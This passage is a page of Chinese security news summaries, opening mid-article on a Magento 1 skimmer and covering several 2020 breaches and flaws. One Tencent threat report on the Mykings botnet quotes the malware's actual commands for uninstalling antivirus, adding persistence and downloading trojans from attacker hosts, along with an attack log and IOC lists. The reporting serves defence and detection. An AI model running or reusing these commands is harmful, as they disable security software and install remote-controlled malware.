1已经过时,Adobe不会提供官方补丁来修复这个漏洞,这使得这个漏洞对使用传统平台的店主造成了额外的伤害。 为了使交易更加顺利,z3r0day承诺只出售10份危险漏洞利用程序。 根据Sansec的实时数据,截至今天,仍有大约9.5 万家Magento 1商店仍在营业。 官方PCI要求在服务器上使用恶意软件和漏洞扫描程序,如Sansec的eComscan。Sansec还建议订阅替代的Magento 1补丁程序支持,例如Mage One提供的支持。 更新:攻击方法 截至周一,Sansec正在对两台受感染的服务器进行调查。攻击者使用IP 92.242.62.210(美国)和91.121.94.121(OVH,FR)与Magento管理面板进行交互,并使用“Magento Connect”功能下载和安装各种文件,包括名为的恶意软件mysql.php。将恶意代码添加到后,该文件已自动删除prototype.js。 2020-09-14T09:57:06  92.242.62.210  GET /downloader/ HTTP/1.1 2020-09-14T09:57:09  92.242.62.210  POST /downloader/ HTTP/1.1 2020-09-14T09:57:09  92.242.62.210  GET /index.php/admin/?SID=XXXX HTTP/1.1 2020-09-14T09:57:10  92.242.62.210  GET /index.php/admin/dashboard/index/key/<hash>/ HTTP/1.1 2020-09-14T09:57:13  92.242.62.210  GET /index.php/admin/system_config/index/key/<hash>/ HTTP/1.1 2020-09-14T09:57:15  92.242.62.210  GET /index.php/admin/system_config/edit/section/dev/key/<hash>/ HTTP/1.1 2020-09-14T09:57:19  92.242.62.210  POST /index.php/admin/system_config/save/section/dev/key/<hash>/ HTTP/1.1 2020-09-14T09:57:20  92.242.62.210  GET /index.php/admin/system_config/edit/section/dev/key/<hash>/ HTTP/1.1 2020-09-14T09:57:22  92.242.62.210  GET /index.php/admin/import/index/key/<hash>/ HTTP/1.1 2020-09-14T09:57:25  92.242.62.210  POST /index.php/admin/import/validate/key/<hash>/ HTTP/1.1 2020-09-14T09:57:25  92.242.62.210  GET /downloader/ HTTP/1.1 2020-09-14T09:57:28  92.242.62.210  POST /downloader/index.php?A=connectInstallPackageUpload&maintenance=1&archive_type=0&backup_name= HTTP/1.1 2020-09-14T09:57:29  92.242.62.210  GET /downloader/index.php?A=cleanCache HTTP/1.1 2020-09-14T09:57:31  92.242.62.210  GET /mysql.php HTTP/1.1 WEB服务器的日志显示,周末有很多人试图安装文件,可能是为了安装改进版的skimmer。 撇渣器分析:mcdnn.net 对于受影响的Magento 1商店,已将加载的撇渣器添加到文件prototype.js中,这是标准Magento安装的一部分。 该//mcdnn.net/122002/assets/js/widget.js服务根据其包含在哪个页面上来提供动态内容。仅当从结帐页面中引用时,它才会提供恶意的按键记录日志代码: 实际付款将被泄露到莫斯科托管的站点https://imags.pw/502.jsp,该站点与mcdnn.net域在同一网络上。     稿件与封面来源:Sansec,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-15 11:45:18hackernews.cc
安全研究员 Volodymyr Diachenko 发现,由于服务器配置错误,Razer 网站于 8 月 18 日公开了超 10 万游戏玩家的个人信息。虽然不包括信用卡付款信息,但截图表明该公司的数字商店订单记录被意外曝光,其中包括消费者的电子邮件、邮寄地址、订购的产品类型、以及电话号码等在内的个人信息。 此事耗费了将近一个月来沟通反馈 在网上发现了这一问题后,Volodymyr Diachenko 在三周内与 RAZER 进行了多次接触,最终收到了一份答复。 这家游戏硬件制造商承认服务器存在配置错误,且用户的个人信息可能已被泄露,包括消费者全名、电话号码、以及送货地址等。 不过 Razer 还是辩称,并没有其它铭感数据(例如付款方式)被泄露,且其已于 9 月 9 日修复了错误的配置。 在致外媒 TheVerge 的电子邮件中,该公司同样确认了该问题,并表示任何有疑问的客户,都可以通过 DPO@razer.com 这个邮箱与他们取得联系。 即便如此,Razer 用户仍需警惕这部分泄露信息被用于网络钓鱼活动,因此还请妥善保管线上账户的密码与付款明细。     (稿源:cnBeta,封面源自网络。)
2020-09-14 11:12:55hackernews.cc
网络安全研究人员发现了一种名为“ CDRThief”的全新Linux恶意软件,该恶意软件针对IP语音(VoIP)软交换,旨在窃取电话元数据。ESET研究人员在周四的分析中说:“该恶意软件的主要目标是从受感染的软交换中窃取各种私人数据,包括呼叫详细记录(CDR)。” “要窃取此元数据,恶意软件会查询软交换使用的内部MySQL数据库。因此,攻击者充分了解了目标平台的内部体系结构。” 软交换(软件交换机的缩写)通常是VoIP服务器,允许电信网络提供对语音、传真、数据和视频流量以及呼叫路由的管理。 ESET的研究发现cdrreiver针对的是一个特定的Linux VoIP平台,即来自中国Linknat公司的VOS2009和3000软交换,并对其恶意功能进行加密,以逃避静态分析。 恶意软件首先试图从预先确定的目录列表中找到软交换配置文件,目的是访问MySQL数据库凭据,然后对其进行解密以查询数据库。 ESET的研究人员说,攻击者必须对平台二进制文件进行反向工程,以分析加密过程,并检索用于解密数据库密码的AES密钥,这表明作者对VoIP体系结构有“深入的了解”。 除了收集有关被破坏的Linknat系统的基本信息外,CDRthicker还过滤数据库的详细信息(用户名、加密密码、IP地址),并直接对MySQL数据库执行SQL查询,以便捕获与系统事件、VoIP网关和呼叫元数据相关的信息。 ESET说:“从e_syslog,e_gatewaymapping和e_cdr表中渗出的数据经过压缩,然后在渗出之前使用硬编码的RSA-1024公钥加密。因此,只有攻击者或操作员才能解密渗入的数据。” 从当前版本的ESET中可以很容易地将恶意软件的更新形式引入到其更新版本中,但这种恶意软件可能只会导致当前版本的数据更新。 也就是说,攻击者的最终目标或有关行动背后的攻击者的信息仍然不清楚。 “在撰写本文时,我们还不知道这些恶意软件是如何部署到被破坏的设备上的,”ESET的安东·切雷帕诺夫说我们推测攻击者可能会使用暴力攻击或利用漏洞来访问设备。” “这似乎是合理的假设,恶意软件是用于网络间谍活动。使用此恶意软件的攻击者的另一个可能目标是VoIP欺诈。由于攻击者获取有关VoIP软交换及其网关的活动信息,这些信息可用于执行国际收入分成欺诈(IRSF)。”     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-14 10:10:56hackernews.cc
据外媒TechCrunch报道,TikTok已经修复了其Android应用中的四个安全漏洞,这些漏洞可能会导致用户账号被劫持。应用安全启动公司Oversecure发现了这些漏洞,这些漏洞可能会让同一设备上的恶意应用从TikTok应用内部窃取敏感文件如会话令牌。会话令牌是一种可让用户登录而无需再输入密码的小文件,如果被盗,这些令牌可以让攻击者在不需要密码的情况下访问用户的账户。 恶意应用将利用这个漏洞向TikTok应用注入一个恶意文件。一旦用户打开应用,恶意文件就会被触发,从而让恶意应用访问并在后台无声地向攻击者的服务器发送偷来的会话令牌。 Oversecure创始人Sergey Toshin告诉TechCrunch,这款恶意应用还可以劫持TikTok的应用权限、允许它访问Android设备的摄像头、麦克风和设备上的私人数据如照片和视频。该公司在其网站上公布了有关漏洞的技术细节。 TikTok表示,在Oversecure报告了这些漏洞后,他们已于今年早些时候修复了它们。     (稿源:cnBeta,封面源自网络。)
2020-09-11 17:47:41hackernews.cc
美国总统大选在即,施加给科技公司的压力也越来越大,如何防止恶意组织的干扰是摆在他们面前的难题。在近日更新的官方博文中,微软表示外国黑客组织针对美国总统大选的活动明显增加。 博文中表示,在过去几周时间里对特朗普和拜登的网络攻击明显增加,这些攻击主要来自于三个黑客组织,分别为 Strontium, Zirconium 和 Phosphorus。 2019年9月至今,Strontium 已经影响了超过 200 多家组织,其中包括协助共和党和民主党的美国顾问,以及国内的国家和州党组织等。Strontium 的作案手法包括收割登录凭证以破坏账户。 而 Zirconium 在过去数月里发动了数千次攻击,其中有 150 次成功。微软报道称,Zirconium 在网络犯罪中采取了双管齐下的方式。其中之一是针对与总统竞选活动直接相关的人:拜登竞选活动一直是主要目标,还有至少一名此前参与特朗普政府的个人。该组织策略的第二项是针对参与国际事务的有影响力的人。Zirconium 使用 “网络信标 “来确定目标用户是否有有效的网络存在,并将其用于侦察活动。 去年微软已经对 Phosphorus 该组织进行了打击,在法院的帮助下即将积极努力控制这个组织正在使用的网络域名。在报告中称,Phosphorus曾多次尝试登录特朗普总统工作人员的账户,但都没有成功。 尽管这些黑客组织的活动有所增加,但微软表示,它已经挫败了大多数针对美国大选的企图,并积极通知那些被针对的人。该公司表示。     (稿源:cnBeta,封面源自网络。)
2020-09-11 17:47:41hackernews.cc
这年头不管多大的公司,一不小心都有可能被黑客盯上,韩国两大电子巨头SK海力士、LG电子就被黑了,多达50GB机密文件被加密勒索。 据韩媒报道,日前一个勒索组织攻击了LG电子和SK海力士的网站,窃取了大量机密,包括极为机密的商业谈判信息。 具体来说,是这两家公司在美国的办事处被攻击,窃取了电脑硬盘中存储的数据,其中既有员工的个人照片、护照副本等个人信息,也有一些商业信息,比如SK海力士与苹果、IBM等客户进行价格谈判的电子邮件等。 从报道来看,SK海力士主要损失的是2013-2015年间的数据,容量大小约为597MB,而LG电子损失的数据容量高达50.1GB。 这次攻击据悉是一个名为Maze的黑客组织进行的,他们已经在网上发布了一部分信息,任何人都可以访问。 如果LG和SK海力士两家再不交钱赎回,那么后续还会放出更多信息,逼迫这两家公司交钱。 随后LG电子和SK海力士公司回应称,他们已经恢复了系统,并采取了安全措施,不过对于机密数据被泄,以及是否交钱赎回数据,两家公司没有回应。 (稿源:快科技,封面源自网络。)
2020-09-11 12:08:52hackernews.cc
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/wZvnq6gVnEdGSH6f6oG8MA   最新版Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制。Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 一、背景 腾讯安全威胁情报中心检测到Mykings挖矿僵尸网络变种木马,更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。 Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 MyKings僵尸网络最早于2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸网络目前已控制超过5万台电脑进行挖矿作业。 腾讯安全系列产品已支持检测、清除Mykings僵尸网络的最新变种,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Mykings僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Mykings僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)    Mykings僵尸网络关联的IOCs已支持识别检测; 2)    通过协议特征检测主机挖矿行为; 3)    SQL Server弱口令爆破登陆行为检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)    已支持查杀Mykings僵尸网络相关木马程序; 2)    云主机SQL Server弱口令风险项检测; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)    已支持通过协议检测Mykings僵尸网络与服务器的网络通信; 2)    通过协议特征检测主机挖矿行为; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀Mykings僵尸网络入侵释放的木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。 Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括: uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe 删除旧版WMI事件过滤器“fuckyoumm2_filter”、消费者“fuckyoumm2_consumer”,从而删除WMI启动项。 2.1持久化 Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。 1、 卸载指定杀毒软件; wmic.exe product where “name like ‘%Eset%'” call uninstall /nointeractive wmic.exe product where “name like ‘%%Kaspersky%%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avast%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avp%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Security%'” call uninstall /nointeractive wmic.exe product where “name like ‘%AntiVirus%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Norton Security%'” call uninstall /nointeractive cmd /c “C:\Progra 1\Malwarebytes\Anti-Malware\unins000.exe” /verysilent /suppressmsgboxes /norestart 2、安装计划任务“oka”启动新版挖矿木马lsma12.exe,杀死进程java.exe; schtasks /create /tn “oka” /tr “cmd /c start c:\windows\inf\aspnet\lsma12.exe -p” /ru “system” /sc onstart /F wmic.exe process where ExecutablePath=’c:\\windows\\java\\java.exe’ call Terminate 3、安装计划任务”Mysa”、”Mysa2″,在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行; schtasks /create /tn “Mysa” /tr “cmd /c echo open ftp.ftp0930.host >s echo test>>s echo 1433>>s echo binary>>s echo get a1.exe c:\windows\update.exe>>s echo bye>>s ftp -s:s c:\windows\update.exe” /ru “system” /sc onstart /F schtasks /create /tn “Mysa2” /tr “cmd /c echo open ftp.ftp0930.host>ps echo test>>ps echo 1433>>ps echo get s1.rar c:\windows\help\lsmosee.exe>>ps echo bye>>ps ftp -s:ps c:\windows\help\lsmosee.exe” /ru “system” /sc onstart /F 4、设置拒绝“system”用户访问指定文件和路径; cacls c:\windows\java\java.exe /e /d system cacls c:\windows\temp\servtestdos.dll /e /d system cacls C:\WINDOWS\Fonts\cd /e /d system 5、安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。 reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg add “HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v “start1” /f SCHTASKS /Delete /TN “Mysa3” /F SCHTASKS /Delete /TN “ok” /F SCHTASKS /Delete /TN “Mysa1” /F SCHTASKS /Delete /TN “my1” /F 6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本: http[:]//ruisgood.ru/power.txt http[:]//gamesoxalic.com/power.txt 或者通过regsvr32下载和执行脚本: http[:]//ruisgood.ru/s.txt http[:]//gamesoxalic.com/s.txt 7、安装WMI启动项“fuckamm3”、“fuckamm4”启动新版挖矿木马程序: 8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序: 2.2自更新 Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括: c:\windows\temp\ntuser.dat c:\windows\temp\upx.exe %temp%\c3.bat %temp%\excludes %temp%\n.vbs Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload网络流量如下: 首先从C2服务器http[:]//95.214.9.95/pld/cmd.txt下载cmd.txt。 然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。 2.3 PcShare远控木马 返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至: c:\windows\debug\item.dat,启动命令为: rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa。 PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。 1.枚举、创建、重命名、删除文件和目录 2.枚举和终止进程 3.编辑注册表项和值 4.枚举和修改服务 5.枚举和控制窗口 6.执行二进制文件 7.从C&C或提供的URL下载其他文件 8.将文件上传到C&C 9.执行shell命令 10.显示消息框 11.重新启动或关闭系统 PcShare连接C2服务器:192.187.111.66:5566。 2.4挖矿 Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程: c:\windows\inf\aspnet\lsma12.exe 挖矿时使用矿池:xmr-eu1.nanopool.org:14444 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 查询该钱包,已挖矿获得143个XMR,折合人民币8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。 IOCs C&C 192.187.111.66:5566 95.214.9.95 Domain ruisgood.ru ftp.ftp0801.ru gamesoxalic.com ftp.ftp0930.host js.down0116.info js.mys2016.info wmi.1217bye.host js.5b6b7b.ru up.mykings.pw kriso.ru f321y.com down.f4321y.com IP 199.168.100.74 173.247.239.186 174.128.235.243 223.25.247.152 167.88.180.175 139.5.177.10 173.247.239.186 185.239.227.82 URL http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/power.txt http[:]//ruisgood.ru/1201.rar http[:]//ruisgood.ru/uninstall.txt http[:]//ruisgood.ru/max.rar http[:]//ruisgood.ru/config2.json http[:]//ruisgood.ru/s.txt http[:]//ruisgood.ru/upx.exe http[:]//ruisgood.ru/s.xsl http[:]//ruisgood.ru/download2.txt http[:]//ruisgood.ru/batpower.txt http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/download.txt http[:]//ruisgood.ru/kill.txt http[:]//ruisgood.ru/up.txt http[:]//ruisgood.ru/wmi.txt http[:]//ruisgood.ru/batpower.tx http[:]//ruisgood.ru/up2.txt http[:]//gamesoxalic.com/power.txt http[:]//gamesoxalic.com/s.txt ftp[:]//199.168.100.74/aa.exe ftp[:]//199.168.100.74/1.dat ftp[:]//ftp.ftp0801.ru/1.dat ftp[:]//ftp.ftp0801.ru/aa.exe ftp[:]//ftp.ftp0930.host/a1.exe ftp[:]//ftp.ftp0930.host/s1.rar http[:]//js.down0116.info:280/v1.sct http[:]//174.128.235.243/wmi.txt http[:]//174.128.235.243/upsupx2.exe http[:]//174.128.235.243/u.exe http[:]//199.168.100.74/20200809.rar http[:]//199.168.100.74:8074/1201.rar http[:]//173.247.239.186:9999/max.exe http[:]//173.247.239.186:9999/u.exe http[:]//185.239.227.82:8082/2.exe http[:]//wmi.1217bye.host/S.ps1 http[:]//95.214.9.95/pld/cmd.txt http[:]//223.25.247.152:8152/batpower.txt http[:]//167.88.180.175:8175/kill.txt http[:]//167.88.180.175:8175/uninstall.txt http[:]//139.5.177.10:280/psa.jpg http[:]//199.168.100.74/2.exe http[:]//199.168.100.74:8074/2.exe http[:]//173.247.239.186/2.exe http[:]//185.239.227.82:8082/2.exe http[:]//173.247.239.186:9999/2.exe http[:]//js.5b6b7b.ru/v.sct http[:]//js.5b6b7b.ru:280/v.sct http[:]//up.mykings.pw/update.txt http[:]//kriso.ru/java12.dat http[:]//js.ftp0930.host/helloworld.msi http[:]//f321y.com:8888/dhelper.dat http[:]//down.f4321y.com:8888/kill.html md5 20200809.rar dce4ac18798ea897cdc9e09e06b178be max.rar bc7fc83ce9762eb97dc28ed1b79a0a10 u.exe d9c32681d65c18d9955f5db42154a0f3 ups.dat d1f978c88023639d6325805eb562de8c upsupx2.exe b5cd8af63e35db23eb1c6a4eb8244c45 address.txt 83bdb3a6fb995788de262b22919524f1 cloud.txt 6b9b70f4e0c8885d12169045e906d698 cmd.txt 6def7a0c5707f24a912c79f6520ca86f kill.txt 1573ab993edc98decc09423fd82ec5ed micro f0129d85b17ee4d29ef52c63e0e548a4 power.txt 5670f0839333e4b160be05177601b40c uninstall.txt 6092899216610fea5c65e416b34c1777 update.txt 581a86fea2afeb9b9d6d04c9a8f0a5c1 wmi.txt 6afc95f60630a588a7826608c70a60c8 wpd.jpg bbae338b0cac5a2d169b8c535f33bfa0 batpower.txt 40160c782c2a41eed8d8eaf0c706050a up.txt 6c190a44db2118d9c07037d769e0a62d ups.txt f41a8a69361fccc13344493c04a4f0d8 s.ps1 966abd05b7ad1b0b89d2a846f8a5a8f2 testav.dat d4f7a3f44ae3f21863b1440219388a5b psa.jpg 9cb1c1a78ce3efe57eef5f128b43710a 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 参考链接: https://www.freebuf.com/articles/193260.html https://www.freebuf.com/articles/network/161286.html https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware
2020-09-11 10:16:01hackernews.cc
蓝牙无线技术背后的组织今天发布了关于设备供应商如何缓解对蓝牙功能设备新攻击的指南。新发现的BLURtooth是蓝牙标准中一个名为Cross-Transport Key Derivation(CTKD)组件中的漏洞。该组件用于在两个蓝牙功能设备配对时协商和设置认证密钥。 该组件的工作原理是为蓝牙低能(BLE)和基本速率/增强数据速率(BR/EDR)标准设置两套不同的认证密钥。CTKD的作用是准备好密钥,让配对的设备决定他们要使用什么版本的蓝牙标准。它的主要用途是蓝牙 “双模式 “功能。 但根据蓝牙特别兴趣小组(SIG)和卡内基梅隆大学CERT协调中心(CERT/CC)今天发布的安全通告,攻击者可以操纵CTKD组件覆盖设备上的其他蓝牙认证密钥,并允许通过蓝牙连接的攻击者访问同一设备上的其他蓝牙功能服务/应用。 在某些版本的BLURtooth攻击中,认证密钥可以被完全覆盖,而其他认证密钥可以降级使用弱加密。所有使用蓝牙4.0到5.0标准的设备都有漏洞。蓝牙5.1标准带有可以激活和防止BLURtooth攻击的功能。 蓝牙SIG组织官员表示,他们开始通知蓝牙设备的供应商关于BLURtooth攻击,以及他们如何在使用5.1标准时减轻其影响。在撰写本文时,补丁还没有立即可用。防止BLURtooth攻击的唯一方法是控制蓝牙设备配对的环境,以防止中间人攻击,或通过社会工程(欺骗人类操作员)与流氓设备配对。 不过,蓝牙SIG组织预计在某个时间点会有补丁,并且被集成作为固件或操作系统更新提供给蓝牙备。目前,这些更新的时间表还不清楚,因为设备供应商和操作系统制造商通常在不同的时间表上工作,一些设备供应商和操作系统制造商可能不会像其他供应商那样优先考虑安全补丁。 用户可以通过检查固件和操作系统的发布说明,查看CVE-2020-15802,即BLURtooth漏洞的bug标识,来跟踪他们的设备是否已经收到BLURtooth攻击的补丁。根据蓝牙SIG的说法,BLURtooth攻击是由洛桑联邦理工学院(EPFL)和普渡大学的两组学者独立发现的。     (稿源:cnBeta,封面源自网络。)
2020-09-10 15:25:40hackernews.cc
据外媒报道,爱尔兰数据保护委员会(DPC)要求Facebook停止将用户数据从欧盟转移到美国。《华尔街日报》周三报道称,初步命令已于8月底发出。Facebook证实,爱尔兰DPC已经开始调查其从欧盟向美国传输的数据。这是欧盟公司和居民主要关心的隐私问题。 欧盟法院的决定使得允许企业将欧盟公民数据发送到美国的欧盟-美国隐私盾牌(EU-US Privacy Shield)这一行为失效。Facebook负责全球事务和通信的副总裁Nick Clegg表示,在做出这一决定后,Facebook一直有在阐明他们在如何确保国际数据传输的长期稳定方面的立场。 Clegg在周三的一份隐私声明中说道:“缺乏安全和合法的国际数据传输将损害欧盟经济、阻碍数据驱动业务的增长,就像我们在新冠中寻求复苏一样。”他表示,这可能意味着欧洲的科技公司、医院和大学不能使用美国的云服务提供商或欧盟以外的呼叫中心。“其影响将超出商业领域,还可能影响到医疗和教育等关键公共服务。” 对此,爱尔兰DPC拒绝置评。     (稿源:cnBeta,封面源自网络。)
2020-09-10 15:25:40hackernews.cc
介绍 TeamTNT是一个网络犯罪组织,其目标是包括Docker和Kubernetes实例在内的云环境。该组织先前已使用多种工具进行了记录,包括加密矿工和Amazon Web Services(AWS)凭证窃取蠕虫。 TeamTNT还被发现使用了恶意Docker镜像,该镜像可在Docker Hub上找到,以感染受害者的服务器。现在该小组正在发展。在Intezer观察到的近期攻击中,TeamTNT通过滥用Weave Scope来使用一种新技术,该工具可为用户提供对其云环境的完全访问权限,并与Docker,Kubernetes,分布式云操作系统(DC / OS)集成在一起,和AWS Elastic Compute Cloud(ECS)。攻击者安装此工具是为了映射受害者的云环境并执行系统命令,而无需在服务器上部署恶意代码。     … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1333/ 消息与封面来源:INTEZER   ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-08 15:04:00hackernews.cc
就在Visa对一款名为Baka的新型JavaScript网络掠取器发出警告之际,网络安全研究人员发现了该公司支持EMV的信用卡中的一个新缺陷,该漏洞使攻击者能够非法获取资金并诈骗持卡人和商户。 这项研究是由苏黎世联邦理工学院的一群学者发表的,它是一种PIN绕行攻击,攻击者可以利用受害者的被盗或丢失的信用卡在不知道该卡PIN的情况下进行高价值购买,甚至骗人一点销售(PoS)终端接受非真实的离线卡交易。 所有使用Visa协议的现代非接触式卡,包括Visa Credit,Visa Debit,Visa Electron和V Pay卡,都受到安全漏洞的影响,但研究人员认为它可以应用于Discover和UnionPay实施的EMV协议。然而,这个漏洞并不影响万事达、美国运通和JCB。 研究结果将在明年5月于旧金山举行的第42届IEEE 安全和隐私研讨会上进行展示。 通过MitM攻击修改卡交易资格 EMV(Europay、Mastercard和Visa的缩写)是广泛使用的智能卡支付的国际协议标准,它要求较大的金额只能从带有PIN码的信用卡中借记。 但ETH研究人员设计的设置利用了协议中的一个关键缺陷,通过Android应用程序发起中间人(MitM)攻击,“指示终端不需要PIN验证,因为持卡人验证是在消费者的设备上进行的。” 这个问题源于这样一个事实:持卡人验证方法(CVM)没有加密保护以防止修改,该方法用于验证尝试使用信用卡或借记卡进行交易的个人是否是合法持卡人。 所以,可以修改用于确定交易所需的CVM检查(如果有的话)的卡交易资格证明(CTQ),以通知PoS终端覆盖PIN验证,并且验证是使用持卡人的设备进行的例如智能手表或智能手机(称为消费设备持卡人验证方法或CDCVM)。 利用离线交易而无需付费 此外,研究人员还发现了第二个漏洞,该漏洞涉及Visa卡或旧万事达卡进行的离线非接触式交易,使得攻击者能够在数据被传送到终端之前修改一个名为“应用密码”(AC)的特定数据。 离线卡通常用于直接从持卡人的银行帐户中支付商品和服务,而无需PIN码。但是,由于这些交易未连接到在线系统,因此在银行使用密码确认交易的合法性之前会有24到72个小时的延迟,然后从帐户中扣除购买金额。 攻击者可以利用这种延迟的处理机制来使用他们的卡来完成低价值的离线交易而无需支付费用,此外,在发卡银行由于密码错误而拒绝交易之前,还可以取消购买。 研究人员说:“这构成了“免费午餐”攻击,因为罪犯可以购买低价值的商品或服务而根本不收取任何费用,”他补充说,这些交易的低价值性质不太可能是“有吸引力的业务”。罪犯的榜样。” 缓解PIN绕过和离线攻击 除了向Visa国际组织通报缺陷外,研究人员还提出了三种软件修复方案,以防止PIN绕过和离线攻击,包括使用动态数据认证(DDA)保护高价值的在线交易,以及要求所有PoS终端使用在线密码,这会导致脱机事务被联机处理。 研究人员得出结论:“我们的攻击表明,PIN对Visa非接触式交易毫无用处,而且揭示了Mastercard和Visa的非接触式支付协议的安全性存在惊人的差异,表明万事达卡比Visa更安全。”这些缺陷违反了基本的安全属性,比如身份验证和有关已接受交易的其他保证。”     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-08 13:39:28hackernews.cc
